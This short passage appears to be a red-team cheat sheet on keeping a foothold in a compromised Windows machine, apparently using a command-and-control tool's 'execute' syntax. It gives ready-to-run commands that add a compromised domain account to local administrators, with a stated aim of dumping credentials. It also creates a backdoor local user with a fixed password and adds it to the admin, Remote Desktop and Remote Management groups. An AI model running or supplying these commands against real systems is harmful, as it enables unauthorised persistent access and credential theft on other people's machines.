Persistence
1) Add a domain user we have already compromised as local admin on the machine - Helps with creds dumping as well
execute -o net localgroup administrators domain.com\\attacker /add
execute -o net localgroup administrators2) Create local user and add into local admins and RDP groups
execute -o net user /add userooo "Password123@" /Y
execute -o net localgroup administrators userooo /add
execute -o net localgroup "Remote Desktop Users" userooo /add
execute -o net localgroup "Remote Management Users" userooo /addLast updated